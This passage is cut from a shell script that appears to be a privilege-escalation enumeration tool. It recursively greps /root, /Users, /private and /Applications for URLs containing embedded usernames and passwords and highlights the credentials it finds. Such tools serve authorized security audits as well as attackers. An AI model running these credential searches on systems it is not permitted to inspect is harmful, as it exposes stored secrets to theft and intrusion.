"s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + echo "" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi